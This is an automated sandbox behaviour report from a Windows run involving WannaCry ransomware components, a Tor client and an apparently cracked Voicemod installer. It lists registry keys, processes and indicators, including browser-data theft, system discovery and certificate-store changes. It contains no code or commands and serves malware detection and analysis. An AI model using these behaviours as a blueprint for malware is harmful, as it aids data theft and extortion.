| N/A | N/A | C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe | N/A |
| N/A | N/A | C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe | N/A |
| N/A | N/A | C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe | N/A |
| N/A | N/A | C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\TaskData\Tor\taskhsvc.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\TaskData\Tor\taskhsvc.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\TaskData\Tor\taskhsvc.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\TaskData\Tor\taskhsvc.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\TaskData\Tor\taskhsvc.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\TaskData\Tor\taskhsvc.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\TaskData\Tor\taskhsvc.exe | N/A |

Browser Information Discovery

discovery

Enumerates physical storage devices

Reads user/profile data of web browsers

spyware stealer

System Location Discovery: System Language Discovery

discovery
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Temp\{ED2F5488-7C7E-4D98-84D2-349C48F9B791}\.cr\vc_redist.x64.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-J0C7N.tmp\vc_redist.x64.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\@[email protected] | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\taskdl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Voicemod Pro by mr.motchy\VoicemodSetup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cscript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Temp\{A60A61C6-DF86-4316-AE12-9063B8D5B120}\.cr\vc_redist.x86.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\WannaCry.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\TaskData\Tor\taskhsvc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-J0C7N.tmp\vc_redist.x86.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\taskdl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\@[email protected] | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\taskse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\@[email protected] | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\WannaCry.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |

Checks SCSI registry key(s)

| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Program Files\Voicemod Desktop\driver\devcon.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Phantom | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags | C:\Program Files\Voicemod Desktop\driver\devcon.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Filters | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000001 | C:\Program Files\Voicemod Desktop\driver\devcon.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\CompatibleIDs | C:\Program Files\Voicemod Desktop\driver\devcon.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000001 | C:\Program Files\Voicemod Desktop\driver\devcon.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags | C:\Program Files\Voicemod Desktop\driver\devcon.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Program Files\Voicemod Desktop\driver\devcon.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Program Files\Voicemod Desktop\driver\devcon.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Phantom | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000002 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Phantom | C:\Program Files\Voicemod Desktop\driver\devcon.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Program Files\Voicemod Desktop\driver\devcon.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\CompatibleIDs | C:\Program Files\Voicemod Desktop\driver\devcon.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\CompatibleIDs | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Filters | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Program Files\Voicemod Desktop\driver\devcon.exe | N/A |
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Filters C:\Windows\system32\DrvInst.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID C:\Program Files\Voicemod Desktop\driver\devcon.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs C:\Program Files\Voicemod Desktop\driver\devcon.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Phantom C:\Program Files\Voicemod Desktop\driver\devcon.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000001 C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000001 C:\Windows\system32\DrvInst.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID C:\Windows\system32\DrvInst.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Phantom C:\Windows\system32\DrvInst.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\LowerFilters C:\Windows\system32\DrvInst.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\UpperFilters C:\Windows\system32\DrvInst.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\CompatibleIDs C:\Program Files\Voicemod Desktop\driver\devcon.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs C:\Program Files\Voicemod Desktop\driver\devcon.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID C:\Program Files\Voicemod Desktop\driver\devcon.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID C:\Program Files\Voicemod Desktop\driver\devcon.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000002 C:\Windows\system32\DrvInst.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\UpperFilters C:\Windows\system32\DrvInst.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\LowerFilters C:\Windows\system32\DrvInst.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Phantom C:\Program Files\Voicemod Desktop\driver\devcon.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\CompatibleIDs C:\Program Files\Voicemod Desktop\driver\devcon.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs C:\Program Files\Voicemod Desktop\driver\devcon.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 C:\Windows\system32\DrvInst.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Service C:\Windows\system32\DrvInst.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\UpperFilters C:\Windows\system32\DrvInst.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID C:\Program Files\Voicemod Desktop\driver\devcon.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Phantom C:\Windows\system32\DrvInst.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\UpperFilters C:\Windows\system32\DrvInst.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs C:\Program Files\Voicemod Desktop\driver\devcon.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs C:\Windows\system32\DrvInst.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 C:\Windows\system32\DrvInst.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Phantom C:\Program Files\Voicemod Desktop\driver\devcon.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 C:\Program Files\Voicemod Desktop\driver\devcon.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Program Files\Voicemod Desktop\driver\devcon.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 C:\Windows\system32\DrvInst.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000002 C:\Program Files\Voicemod Desktop\driver\devcon.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\DrvInst.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\Users\Admin\Downloads\Unconfirmed 454771.crdownload:SmartScreen C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Users\Admin\Downloads\Unconfirmed 528376.crdownload:SmartScreen C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Users\Admin\Downloads\Unconfirmed 569269.crdownload:SmartScreen C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Users\Admin\Downloads\Unconfirmed 554491.crdownload:SmartScreen C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
N/A N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
N/A N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
N/A N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
N/A N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
N/A N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
N/A N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
N/A N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
N/A N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\Downloads\TaskData\Tor\taskhsvc.exe N/A
N/A N/A C:\Users\Admin\Downloads\TaskData\Tor\taskhsvc.exe N/A
N/A N/A C:\Users\Admin\Downloads\TaskData\Tor\taskhsvc.exe N/A
N/A N/A C:\Users\Admin\Downloads\TaskData\Tor\taskhsvc.exe N/A
N/A N/A C:\Users\Admin\Downloads\TaskData\Tor\taskhsvc.exe N/A
N/A N/A C:\Users\Admin\Downloads\TaskData\Tor\taskhsvc.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeAuditPrivilege N/A C:\Windows\system32\svchost.exe N/A
